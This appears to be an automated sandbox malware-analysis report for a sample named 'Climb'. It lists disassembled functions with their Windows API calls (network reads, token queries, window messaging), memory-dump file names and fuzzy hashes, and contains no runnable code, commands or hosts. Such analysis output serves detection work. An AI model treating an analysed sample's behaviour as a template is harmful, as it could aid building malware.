Function 00559517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00559534
VariantClear.OLEAUT32 ref: 005595A5
VariantClear.OLEAUT32 ref: 00559604
VariantClear.OLEAUT32(?), ref: 00559677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 005596A2

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 5e4432cc5ac328619a44b8c484359522a8df72df0732c2cf1931d161d413ae98
Instruction ID: 41c2358ef70fd0d1e1e459d86ac9ed959993f3dc7727994a316e5bf4c018c6f4
Opcode Fuzzy Hash: 5e4432cc5ac328619a44b8c484359522a8df72df0732c2cf1931d161d413ae98
Instruction Fuzzy Hash: 6F5159B5A00219EFCB10CF58C894EAABBF9FF88310B15855AED09DB310E774E915CB90

Function 00569540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005695F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0056961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00569677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0056969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 005696A4

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 037b5f2a2c0a5b5dbb4e7f7ec59af1c047bc5fedd9c2d64274749bc74cef3426
Instruction ID: 2b7c34004734f6a0f1f38576a596cfaeb26e15431b38d4b1173a48315daee0fa
Opcode Fuzzy Hash: 037b5f2a2c0a5b5dbb4e7f7ec59af1c047bc5fedd9c2d64274749bc74cef3426
Instruction Fuzzy Hash: 80514E35A00219AFDF05DF55C881E69BBF5FF49318F048059E94AAB3A2CB35ED41CB94

Function 00579941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 0057999D
GetProcAddress.KERNEL32(00000000,?), ref: 00579A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00579A49
GetProcAddress.KERNEL32(00000000,?), ref: 00579A8F
FreeLibrary.KERNEL32(00000000), ref: 00579AAF

Part of subcall function 0050F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00561A02,?,7529E610), ref: 0050F9F1
Part of subcall function 0050F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00550354,00000000,00000000,?,?,00561A02,?,7529E610,?,00550354), ref: 0050FA18

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 708fbc93cc57c25074a96505ac5d393c432e771e2f5110bf370aac451a651072
Instruction ID: 532b94caec8e602df5c4e2bc8e26037263717ad999f950c1de1d13539576a14a
Opcode Fuzzy Hash: 708fbc93cc57c25074a96505ac5d393c432e771e2f5110bf370aac451a651072
Instruction Fuzzy Hash: 62513A35601209DFCB01DF69C485CADBBF0FF09314B1481A9E90AAB762D731ED86DBA1

Function 005875AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 0058766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00587682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 005876AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0056B5BE,00000000,00000000), ref: 005876D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 005876FF

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: efacfce2fad43141e7823e99cf592ad3695f5355440df1cbada0e80b4b3add96
Instruction ID: 8bb0efadf0418fa7eb669029f252bf8127d66757a6a1bfeffdb5e6871a21dd92
Opcode Fuzzy Hash: efacfce2fad43141e7823e99cf592ad3695f5355440df1cbada0e80b4b3add96
Instruction Fuzzy Hash: 27419D35A08508AFD725AB6DC848FA57FA5FB09360F250264EC19B72E0E770ED50DB50

Function 005223C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00522433
_free.LIBCMT ref: 00522453

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b3c32ea7aa235c9ede97244fdf7406c6c6b602ae126d66bc0c5710bf7d5f44aa
Instruction ID: 9278338d68f4606730a99efd585dcb908b577fe42163f1f83290b5b8e0bdc3c1
Opcode Fuzzy Hash: b3c32ea7aa235c9ede97244fdf7406c6c6b602ae126d66bc0c5710bf7d5f44aa
Instruction Fuzzy Hash: BE41E436A00210AFDB24EF78D884A5DBBF1FF8A314F154569E515EB391EB31AD42CB80

Function 0055224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00552262
PostMessageW.USER32(00000001,00000201,00000001), ref: 0055230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00552316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00552327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 0055232F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2878a0c8f54b51328e27598a26cf6dd5c3d7ce808132b1718ce307983e3f7c87
Instruction ID: 1c4ef27e5f45976b09e2c2df0305b97622c54c946c021a327386cbefc1c2052e
Opcode Fuzzy Hash: 2878a0c8f54b51328e27598a26cf6dd5c3d7ce808132b1718ce307983e3f7c87
Instruction Fuzzy Hash: D231D175900219EFDB00CFA8CD88ADE3BB5FB15316F004626FD25AB2D0C370A948DBA0

Function 0056D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0056CC63,00000000), ref: 0056D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 0056D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,0056CC63,00000000), ref: 0056D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,0056CC63,00000000), ref: 0056DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,0056CC63,00000000), ref: 0056DA37

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 25bc25fc86b3be2d6668fb552d24b8b99f8ae535005e1b5e84173e02606aef98
Instruction ID: 60e6f9472e71d8786332a445aa9ff64dd90876979381d2b9dd22d9667545cab2
Opcode Fuzzy Hash: 25bc25fc86b3be2d6668fb552d24b8b99f8ae535005e1b5e84173e02606aef98
Instruction Fuzzy Hash: 19314C71A04209EFDB20DFA5D884EAABBF8FF14354B10482EE546E7150D730AE44DB70

Function 005861A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 005861E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 0058623C
_wcslen.LIBCMT ref: 0058624E
_wcslen.LIBCMT ref: 00586259
SendMessageW.USER32(?,00001002,00000000,?), ref: 005862B5

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 8544cf91239fb21d27b7b400a9999f23ac9f892c33cd0a71bb163d42a45a1151
Instruction ID: 416f59ee073e938f296cf1f8dd3517f8ac95481dd2d9f60e6e3764db8f0b5b87
Opcode Fuzzy Hash: 8544cf91239fb21d27b7b400a9999f23ac9f892c33cd0a71bb163d42a45a1151
Instruction Fuzzy Hash: AF218F759002189AEB10AFA4CC88AEE7FB9FB44324F104656FE25FA180EB709985CF50

Function 0057138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 005713AE
GetForegroundWindow.USER32 ref: 005713C5
GetDC.USER32(00000000), ref: 00571401
GetPixel.GDI32(00000000,?,00000003), ref: 0057140D
ReleaseDC.USER32(00000000,00000003), ref: 00571445

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 848f5348245fc29bbaf77dff4340b4cb6bb384298738157801bae2f5cf08350a
Instruction ID: e54e68dbc4cae1d0935fdd2ee48574d3c9869fb1675b9a05e4b65045f5011b33
Opcode Fuzzy Hash: 848f5348245fc29bbaf77dff4340b4cb6bb384298738157801bae2f5cf08350a
Instruction Fuzzy Hash: 99218435600608AFD704DF65DC88E6EBBF5FF54300B148429E84AE7791DB70AD04DB90

Function 0052D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0052D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0052D169

Part of subcall function 00523B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00516A79,?,0000015D,?,?,?,?,005185B0,000000FF,00000000,?,?), ref: 00523BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0052D18F
_free.LIBCMT ref: 0052D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0052D1B1

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: c6d1ddc91e4748c214983c07562fc84668ea635f6320114c4c2e6469b4d3a3e2
Instruction ID: fbcd0de7b06d4c0947cf4f01208e94eeca3a6b6d4bc18dbefdddc620ccc9963c
Opcode Fuzzy Hash: c6d1ddc91e4748c214983c07562fc84668ea635f6320114c4c2e6469b4d3a3e2
Instruction Fuzzy Hash: F001B1766057357F63212A666C8CC7B6EBDFEC3B613140129BC04D26C0DA648C11D2B0

Function 0052316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,0051F64E,0051545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00523170
_free.LIBCMT ref: 005231A5
_free.LIBCMT ref: 005231CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005231D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005231E2

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a2612529f07d74123ab721a71e53d5996dbd799764fe7a4e0f592caaacff3617
Instruction ID: 5a722e57d26cad2fb920985bd980ef3d323e0ce7eaf73ddba6f406284f4314c4
Opcode Fuzzy Hash: a2612529f07d74123ab721a71e53d5996dbd799764fe7a4e0f592caaacff3617
Instruction Fuzzy Hash: 1E01F976640A313BD7162734BC8AE2B1F6DBFD33717200938FC15A21D1EE298A1AD521

Function 005508FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?,?,00550C4E), ref: 0055091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?), ref: 00550954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550960

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: c5a6baafd70be2f904ebed392e0a8d5ca401e071f06300ed790c5e5342689e13
Instruction ID: b301cc956e180273c5323af8ded3a86bd7defab6672f8c2920da7dcbd3524387
Opcode Fuzzy Hash: c5a6baafd70be2f904ebed392e0a8d5ca401e071f06300ed790c5e5342689e13
Instruction Fuzzy Hash: B3015672600205AFEB104F55DC44AAA7FFDEB847A2F142125BD05E3296E771DD48ABA0

Function 0055F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0055F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 0055F2BC
Sleep.KERNEL32(00000000), ref: 0055F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 0055F2CE
Sleep.KERNEL32 ref: 0055F30A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8954d726f03abc78d7b46274baba7d27979b84c3616cae3c237407fae57f3c60
Instruction ID: ed420085cb32df16d05df03526d606c31122112e2f3110bfd40b93b6255c8563
Opcode Fuzzy Hash: 8954d726f03abc78d7b46274baba7d27979b84c3616cae3c237407fae57f3c60
Instruction Fuzzy Hash: 86015B75C01519DBDF00AFA4DC5DAEEBBB9BF18702F010866D941B2290DB309558D7A1

Function 00551A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00551A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00551A99

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 9f38bd1697b25a4e55efabaa2b62725cb2101b84ed6fae2448dc20799e0ca0a7
Instruction ID: fdbb193271a97464d9ea74188ae1dd3c1354d1220584f98d0c4e078c07709b3b
Opcode Fuzzy Hash: 9f38bd1697b25a4e55efabaa2b62725cb2101b84ed6fae2448dc20799e0ca0a7
Instruction Fuzzy Hash: D90146B9601605BFDB124FA5DC48E6A3FBAEF882A5B210415FC45E22A0DA31DC449B70

Function 00551960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00551976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00551982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00551991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00551998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005519AE

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 05605559239f5d0fdeaa26efd192e6bc88df597a3ad22d7e7962212eb157cbbd
Instruction ID: 6d908027ae8b8fd8571b9d20ab0a229e4cfd01945ff9cc9de801832af0d1cac2
Opcode Fuzzy Hash: 05605559239f5d0fdeaa26efd192e6bc88df597a3ad22d7e7962212eb157cbbd
Instruction Fuzzy Hash: D5F03775200701ABDB214FA9EC6DF963FBDEF896A1F100415FE45AB2A0DA71E804DB70

Function 00551900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00551916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00551922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00551931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00551938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0055194E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0e134db9f22dbae1a7823c51393c15190b039ab86ac24a6390230f5997cd5c66
Instruction ID: 631296b7f34bd6f3e9a3487a5484412448e2ebbe618fbf80cc6f347002bdb3fa
Opcode Fuzzy Hash: 0e134db9f22dbae1a7823c51393c15190b039ab86ac24a6390230f5997cd5c66
Instruction Fuzzy Hash: 17F03775200702ABDB210FA9AC5DF563FB9EF897A1F110415FE45AB2A0DA71D804DB70

Function 00560CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CCB
CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CD8
CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CE5
CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CF2
CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CFF
CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560D0C

Memory Dump Source

